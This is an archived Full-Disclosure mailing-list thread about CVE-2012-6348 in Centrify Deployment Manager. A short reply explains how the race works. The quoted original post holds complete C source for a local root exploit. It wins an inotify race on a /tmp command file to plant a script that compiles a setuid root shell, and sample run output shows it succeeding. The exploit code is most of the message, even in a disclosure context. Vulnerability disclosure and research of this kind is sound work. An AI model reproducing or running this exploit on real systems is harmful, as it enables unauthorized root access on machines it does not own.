[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] Local root exploit for Centrify Deployment Manager < v2.1.0.283 local root

To: Alexander Georgiev <alexander.georgiev@xxxxxxxx>
Subject: Re: [Full-disclosure] Local root exploit for Centrify Deployment Manager < v2.1.0.283 local root
From: "Larry W. Cashdollar" <larry0@xxxxxx>
Date: Fri, 04 Jan 2013 21:58:43 +0000 (GMT)

<html><body><div>Hi Alexander,<br><br>Sorry for the late response. <br><br>Yes, 
exactly. I create the file centrify.cmd.0 before they echo into it so I own it, 
then wait for them to change<br>the permissions on the file (this occurs after 
they overwrite it with their shell script) to copy my malicious code<br>in 
place.&nbsp; They then execute the file with dzdo.<br></div><div><div><br>-- 
Larry<br><br>On Dec 19, 2012, at 05:27 AM, Alexander Georgiev 
&lt;alexander.georgiev@xxxxxxxx&gt; wrote:<br><br><div><blockquote 
type="cite"><div class="msg-quote"><div class="moz-cite-prefix">Could you 
explain me how it works? It looks like you create a file, which will be chown'd 
to root by the system, right?<br> <br> <br> <br> Am 18.12.2012 21:56, schrieb 
Larry W. Cashdollar:<br></div><blockquote type="cite"><div>These guys were 
really cool about it, probably one of the best vendor responses I've 
gotten.&nbsp; I am seeing if<br> I can go to the next iteration of training. 
=-&gt;&nbsp; <br></div><div><br> On Dec 18, 2012, at 12:51 PM, Jeffrey Walton 
<a class="moz-txt-link-rfc2396E" href="mailto:noloader@xxxxxxxxx"; 
data-mce-href="mailto:noloader@xxxxxxxxx";>&lt;noloader@xxxxxxxxx&gt;</a> 
wrote:<br> <br><div><blockquote type="cite"><div class="msg-quote"><div 
class="_stretch">I've got a feeling you will not be sent to anymore vendor 
classes :)<br> <br> On Tue, Dec 18, 2012 at 3:49 PM, Larry W. Cashdollar &lt;<a 
href="mailto:larry0@xxxxxx"; 
data-mce-href="mailto:larry0@xxxxxx";>larry0@xxxxxx</a>&gt; wrote:<br> &gt; 
/*Local root exploit for Centrify Deployment Manager v2.1.0.283 local root,<br> 
&gt; Centrify released a fix very quickly - nice vendor response.<br> &gt;<br> 
&gt; <a href="http://vapid.dhs.org/exploits/centrify_local_r00t.c"; 
data-mce-href="http://vapid.dhs.org/exploits/centrify_local_r00t.c";>http://vapid.dhs.org/exploits/centrify_local_r00t.c</a><br>
 &gt;<br> &gt; CVE-2012-6348 12/17/2012<br> &gt; <a 
href="http://vapid.dhs.org/advisories/centrify_deployment_manager_insecure_tmp2.html";
 
data-mce-href="http://vapid.dhs.org/advisories/centrify_deployment_manager_insecure_tmp2.html";>http://vapid.dhs.org/advisories/centrify_deployment_manager_insecure_tmp2.html</a><br>
 &gt; Greetings vladz, Thanks for the inotify &amp; syscall technique.<br> 
&gt;<br> &gt; This exploit based on <a 
href="http://vladz.devzero.fr/010_bzexe-vuln.php"; 
data-mce-href="http://vladz.devzero.fr/010_bzexe-vuln.php";>http://vladz.devzero.fr/010_bzexe-vuln.php</a><br>
 &gt;<br> &gt; Run the exploit and wait for administrator to analyse or 
deploysoftware<br> &gt; to the system.<br> &gt;<br> &gt; 
larry@h0g:~/code/exploit$ ./cent_root centrify.cmd.0<br> &gt; [*] Launching 
attack against "centrify.cmd.0"<br> &gt; [+] Creating evil script 
(/tmp/evil)<br> &gt; [+] Creating target file (/bin/touch 
/tmp/centrify.cmd.0)<br> &gt; [+] Initialize inotify<br> &gt; [+] Waiting for 
root to launch "centrify.cmd.0"<br> &gt; [+] Opening root shell (/tmp/sh)<br> 
&gt; #<br> &gt;<br> &gt; Larry W. Cashdollar<br> &gt; @_larry0<br> &gt; */<br> 
&gt;<br> &gt;<br> &gt; #include &lt;stdlib.h&gt;<br> &gt; #include 
&lt;stdio.h&gt;<br> &gt; #include &lt;unistd.h&gt;<br> &gt; #include 
&lt;sys/stat.h&gt;<br> &gt; #include &lt;sys/types.h&gt;<br> &gt; #include 
&lt;string.h&gt;<br> &gt; #include &lt;sys/inotify.h&gt;<br> &gt; #include 
&lt;fcntl.h&gt;<br> &gt; #include &lt;sys/syscall.h&gt;<br> &gt;<br> &gt; 
/*Create a small c program to pop us a root shell*/<br> &gt; int 
create_nasty_shell(char *file) {<br> &gt; char *s = "#!/bin/bash\n"<br> &gt; 
"echo 'main(){setuid(0);execve(\"/bin/sh\",0,0);}'&gt;/tmp/sh.c\n"<br> &gt; "cc 
/tmp/sh.c -o /tmp/sh; chown root:root /tmp/sh\n"<br> &gt; "chmod 4755 
/tmp/sh;\n";<br> &gt;<br> &gt; int fd = open(file, O_CREAT|O_RDWR, 
S_IRWXU|S_IRWXG|S_IRWXO);<br> &gt; write(fd, s, strlen(s));<br> &gt; 
close(fd);<br> &gt;<br> &gt; return 0;<br> &gt; }<br> &gt;<br> &gt;<br> &gt; 
int main(int argc, char **argv) {<br> &gt; int fd, wd;<br> &gt; char buf[1], 
*targetpath, *cmd,<br> &gt; *evilsh = "/tmp/evil", *trash = "/tmp/trash";<br> 
&gt;<br> &gt; if (argc &lt; 2) {<br> &gt; printf("Usage: %s &lt;target file&gt; 
\n", argv[0]);<br> &gt; return 1;<br> &gt; }<br> &gt;<br> &gt; printf("[*] 
Launching attack against \"%s\"\n", argv[1]);<br> &gt;<br> &gt; printf("[+] 
Creating evil script (/tmp/evil)\n");<br> &gt; create_nasty_shell(evilsh);<br> 
&gt;<br> &gt; targetpath = malloc(sizeof(argv[1]) + 6);<br> &gt; cmd = 
malloc(sizeof(char) * 32);<br> &gt; sprintf(targetpath, "/tmp/%s", 
argv[1]);<br> &gt; sprintf(cmd,"/bin/touch %s",targetpath);<br> &gt; 
printf("[+] Creating target file (%s)\n",cmd);<br> &gt; system(cmd);<br> 
&gt;<br> &gt; printf("[+] Initialize inotify\n");<br> &gt; fd = 
inotify_init();<br> &gt; wd = inotify_add_watch(fd, targetpath, IN_ATTRIB);<br> 
&gt;<br> &gt; printf("[+] Waiting for root to change perms on \"%s\"\n", 
argv[1]);<br> &gt; syscall(SYS_read, fd, buf, 1);<br> &gt; syscall(SYS_rename, 
targetpath, trash);<br> &gt; syscall(SYS_rename, evilsh, targetpath);<br> 
&gt;<br> &gt; inotify_rm_watch(fd, wd);<br> &gt;<br> &gt; printf("[+] Opening 
root shell (/tmp/sh)\n");<br> &gt; sleep(2);<br> &gt; system("rm -fr 
/tmp/trash;/tmp/sh || echo \"[-] Failed.\"");<br> &gt;<br> &gt; return 0;<br> 
&gt; }<br></div></div></blockquote></div></div><br><fieldset 
class="mimeAttachmentHeader"></fieldset><br><pre>_______________________________________________
Full-Disclosure - We believe in it.
Charter: <a class="moz-txt-link-freetext" 
href="http://lists.grok.org.uk/full-disclosure-charter.html"; 
data-mce-href="http://lists.grok.org.uk/full-disclosure-charter.html";>http://lists.grok.org.uk/full-disclosure-charter.html</a>
Hosted and sponsored by Secunia - <a class="moz-txt-link-freetext" 
href="http://secunia.com/"; 
data-mce-href="http://secunia.com/";>http://secunia.com/</a><div 
style="width:0px; height:0px;">&nbsp;</div></pre></blockquote><br><div 
class="_stretch">_______________________________________________<br> 
Full-Disclosure - We believe in it.<br> Charter: <a 
href="http://lists.grok.org.uk/full-disclosure-charter.html"; 
data-mce-href="http://lists.grok.org.uk/full-disclosure-charter.html";>http://lists.grok.org.uk/full-disclosure-charter.html</a><br>
 Hosted and sponsored by Secunia - <a href="http://secunia.com/"; 
data-mce-href="http://secunia.com/";>http://secunia.com/</a><div 
style="width:0px; 
height:0px;">&nbsp;</div></div></div></blockquote></div></div></div><style 
class="_message-styles">div.msg-quote { background-color:#FFFFFF;}
</style></body></html>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: [Full-disclosure] DoS vulnerability in Flash player (access violation)
Next by Date: [Full-disclosure] [SECURITY] [DSA 2598-1] weechat security update
Previous by thread: [Full-disclosure] DoS vulnerability in Flash player (access violation)
Next by thread: [Full-disclosure] [SECURITY] [DSA 2598-1] weechat security update
Index(es):
- Date
- Thread